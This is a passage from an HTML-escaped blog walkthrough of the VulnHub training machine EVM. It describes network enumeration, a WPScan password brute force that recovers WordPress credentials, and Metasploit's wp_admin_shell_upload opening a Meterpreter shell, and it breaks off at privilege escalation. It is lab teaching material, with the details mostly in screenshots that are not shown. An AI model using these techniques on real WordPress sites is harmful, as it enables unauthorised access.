medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;230&quot; data-original-width=&quot;623&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXYoEndKjb9d94HxNogZ4L-bC5hRA4RqwnMEoH55IGzKxLCAzmZ9dzVNziXJeRpOkNqAr8i6flilV78sOpahp8W2um0_SS2_DUTxiSmMoDKmFyqoIZqO1a9Z0ehNDJJqbBbrMy2gXWWgNu/s16000/screenshot.26.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;1 - INTRODUCTION&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;-&amp;nbsp;The goal of this exercise is to develop a hacking process for the vulnerable machine &lt;b&gt;EVM&lt;/b&gt;, from the VulnHub pentesting platform.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;-&amp;nbsp; EVM can be downloaded from here:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://www.vulnhub.com/entry/evm-1,391/&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;https://www.vulnhub.com/entry/evm-1,391/&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Once downloaded &lt;b&gt;EVM &lt;/b&gt;and extracted with VirtualBox:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTprIbyhJdNSLdQKYF2xlOj7n8Z9I5bi2OE2AsOliNI2vPm78W-12fZuAtcuqPfEduHEl0As2QLEFm4ns942bpQYN-5ljsBWZzVkaXl52AS-skGpY5H0HKJM2fV3jp00zedjblz8jWvVRN/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;115&quot; data-original-width=&quot;498&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTprIbyhJdNSLdQKYF2xlOj7n8Z9I5bi2OE2AsOliNI2vPm78W-12fZuAtcuqPfEduHEl0As2QLEFm4ns942bpQYN-5ljsBWZzVkaXl52AS-skGpY5H0HKJM2fV3jp00zedjblz8jWvVRN/s16000/screenshot.1.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;2 - ENUMERATION&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- netdiscover helps to find EVM&#39;s IP 192.168.1.31:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOUh9ja5J_Od4RwS05yiYZktNw3IXG3Ao-qcnuLStuatTK91giA0ZByeqzz5ABsaOZq2j7yBGBqxRix99kUwv7_Ne0Pth-eVcqNdKgG92PSCMiJmg4fiRLPuCQml-LPR1NUnnwtHlkKM-K/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;47&quot; data-original-width=&quot;431&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOUh9ja5J_Od4RwS05yiYZktNw3IXG3Ao-qcnuLStuatTK91giA0ZByeqzz5ABsaOZq2j7yBGBqxRix99kUwv7_Ne0Pth-eVcqNdKgG92PSCMiJmg4fiRLPuCQml-LPR1NUnnwtHlkKM-K/s16000/screenshot.6.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiTUwcWVxD59U1hK8vJ4D50E7SUF4H0vWxO65HrVP6jDBFM6fwYWSShEsrIzZMgrezadMEWbz9NHcmtDJTXpbjExSbY_5NhqFznG_mCbKowA8v_f2eQuXo_xbqu7SrGcF0PN_Sy7hHPNHI/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;261&quot; data-original-width=&quot;829&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiTUwcWVxD59U1hK8vJ4D50E7SUF4H0vWxO65HrVP6jDBFM6fwYWSShEsrIzZMgrezadMEWbz9NHcmtDJTXpbjExSbY_5NhqFznG_mCbKowA8v_f2eQuXo_xbqu7SrGcF0PN_Sy7hHPNHI/s16000/screenshot.9.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;- Scanning with Nmap:&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiScXlwalwG0ALK60NrFEIO7AGF-MnTaa6-OBi2X_rn8kUaj4kaedeVPDTy0-VBQfEGNT_pAEw5GEmrKOwb57YhmUovmzOv7q_kqAlUXzEEs5bs78Kfy1F_Y2WjEbeOd1-L-VHUuSksioFk/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;332&quot; data-original-width=&quot;438&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiScXlwalwG0ALK60NrFEIO7AGF-MnTaa6-OBi2X_rn8kUaj4kaedeVPDTy0-VBQfEGNT_pAEw5GEmrKOwb57YhmUovmzOv7q_kqAlUXzEEs5bs78Kfy1F_Y2WjEbeOd1-L-VHUuSksioFk/s16000/screenshot.7.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Browsing the web server there is a message about a &lt;b&gt;wordpress&lt;/b&gt; vulnerable webapp:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxkKxNpAJEHd9RYJgFBc83AFbO5ZBICaTq7wfKXTVSK7Zf2Lydp-EWqkbJXDloOl2KYc2opA-Bz3pJ9A0aD5aXDnnWtpiRjZJTLv5BoYluxf-XKgM2jbTNxlps7fhby928JWr77fJdDAN1/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;635&quot; data-original-width=&quot;833&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxkKxNpAJEHd9RYJgFBc83AFbO5ZBICaTq7wfKXTVSK7Zf2Lydp-EWqkbJXDloOl2KYc2opA-Bz3pJ9A0aD5aXDnnWtpiRjZJTLv5BoYluxf-XKgM2jbTNxlps7fhby928JWr77fJdDAN1/s16000/screenshot.5.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;3 - EXPLOITATION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- &lt;b&gt;WPScan&lt;/b&gt; discovers plugins and users at &lt;b&gt;Wordpress,&lt;/b&gt; for instance user&lt;b&gt; c0rrupt3d_brain:&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnFgIWakAxwTQUHIS125fOl9GRRQ1yehyphenhyphenJk9yuADAwA49c0kt6etcKu0Hs6EnMTYI-5-ayHIw7sSfHAYpuSExhAAjZshVbB60XvOXDiWxJekKdqF1qh-yjSBrpebfbI3b6VY5nyifv2P3m/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;57&quot; data-original-width=&quot;648&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnFgIWakAxwTQUHIS125fOl9GRRQ1yehyphenhyphenJk9yuADAwA49c0kt6etcKu0Hs6EnMTYI-5-ayHIw7sSfHAYpuSExhAAjZshVbB60XvOXDiWxJekKdqF1qh-yjSBrpebfbI3b6VY5nyifv2P3m/s16000/screenshot.10.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1jw09ybLjFb9JvBhLVPGLbWAunSOS8abXKQrUVZDz4DDEbQNDu3uGjIz5CTxlfjWzT3vSiv61HfM4I7WRwG1tboPxy7eEFBAZQrll82CDM7HY4rv-rFebwR6Pzq6-gB2ukwijosTBjtaR/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;155&quot; data-original-width=&quot;648&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1jw09ybLjFb9JvBhLVPGLbWAunSOS8abXKQrUVZDz4DDEbQNDu3uGjIz5CTxlfjWzT3vSiv61HfM4I7WRwG1tboPxy7eEFBAZQrll82CDM7HY4rv-rFebwR6Pzq6-gB2ukwijosTBjtaR/s16000/screenshot.12.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Again &lt;b&gt;WPSCan&lt;/b&gt;, now in combination with wordlist &lt;b&gt;rockyou.txt&lt;/b&gt;, discovers credentials&amp;nbsp;&lt;b&gt;c0rrupt3d_brain:24992499&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR_CJOE9Q5M8BcHWJoWDpHexH-dBzQm_qoybKjR_mSwp3wUK6GAo9J_6absBun9LKZy5-XDdo5G6J8wmVXnqREmFhTGclslM5azGb4fdo8jMa6iKBSJFAWNSC3DU8wTk9mVtsjrROuIQVo/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;330&quot; data-original-width=&quot;1118&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR_CJOE9Q5M8BcHWJoWDpHexH-dBzQm_qoybKjR_mSwp3wUK6GAo9J_6absBun9LKZy5-XDdo5G6J8wmVXnqREmFhTGclslM5azGb4fdo8jMa6iKBSJFAWNSC3DU8wTk9mVtsjrROuIQVo/s16000/screenshot.27.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;b&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIJItNHBsIifhZxIbz-vFH9XObZnLyOb0RpoSkELNe4SookudxAfgyGhy4ePj90aULZWy5lt6Z5TdCLWhzkieLynDd9YpOXQby8FoSwZh7h49pvohqpPTAgkSd-YyKD6WYyVrOG1tV0KhC/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;164&quot; data-original-width=&quot;665&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIJItNHBsIifhZxIbz-vFH9XObZnLyOb0RpoSkELNe4SookudxAfgyGhy4ePj90aULZWy5lt6Z5TdCLWhzkieLynDd9YpOXQby8FoSwZh7h49pvohqpPTAgkSd-YyKD6WYyVrOG1tV0KhC/s16000/screenshot.18.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Metasploit exploit &lt;b&gt;wp_admin_shell_upload&lt;/b&gt; helps to trigger a shell, by setting&amp;nbsp;&lt;b&gt;c0rrupt3d_brain:24992499&lt;/b&gt; as parameters:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBjIe-dWdZ0DsYtaT2cDQhTa7DbEdWRsdMQgKypw-Lvl0MxmwWhb8AcM7RN-t1mYKI6ew1AhBBvwZLSP6nHdW0vVlb8wL4Y8yDfrjbhrhnVA6YNLEbsrg7RYtfup-cuRySEQ0EMElrM4ub/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;229&quot; data-original-width=&quot;878&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBjIe-dWdZ0DsYtaT2cDQhTa7DbEdWRsdMQgKypw-Lvl0MxmwWhb8AcM7RN-t1mYKI6ew1AhBBvwZLSP6nHdW0vVlb8wL4Y8yDfrjbhrhnVA6YNLEbsrg7RYtfup-cuRySEQ0EMElrM4ub/s16000/screenshot.13.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;b&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Running the exploit a &lt;b&gt;Meterpreter&lt;/b&gt; session is opened:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi55hgJ1gRtA0rRuY9v9Kk8FeABFJ0MEtVsCiTg0V2nn8UYUk_h0m_8V5oY9mS0KNmX-hct2O0Kw6PyNYprTmrk1J4Af0wog6wEBVpS3NKjT0UT0mW8EEb3_T6xr-LkX7p7YaWkWcx9TY7W/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;313&quot; data-original-width=&quot;981&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi55hgJ1gRtA0rRuY9v9Kk8FeABFJ0MEtVsCiTg0V2nn8UYUk_h0m_8V5oY9mS0KNmX-hct2O0Kw6PyNYprTmrk1J4Af0wog6wEBVpS3NKjT0UT0mW8EEb3_T6xr-LkX7p7YaWkWcx9TY7W/s16000/screenshot.14.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;b&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;color: #6fa8dc;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;color: #6fa8dc;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;4 - PRIVILEGE ESCALATION&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Looking for folders and files we find&amp;nbsp;&lt;b&gt;root3r:&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnKEYcsAmtCktnxaCYnPOKfRjPIrvPqQzAgZhNuTcUG7lXXhyphenhyphensOOAsCpUyhtD1C5T_mFziHfLeioSBWgx5SSmewzlhsUtFmTWwrJIC9EWRJAfeP5GAdbuaiiSvREuXvEXL4PfuZ986iuz_/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;168&quot; data-original-width=&quot;700&quot; 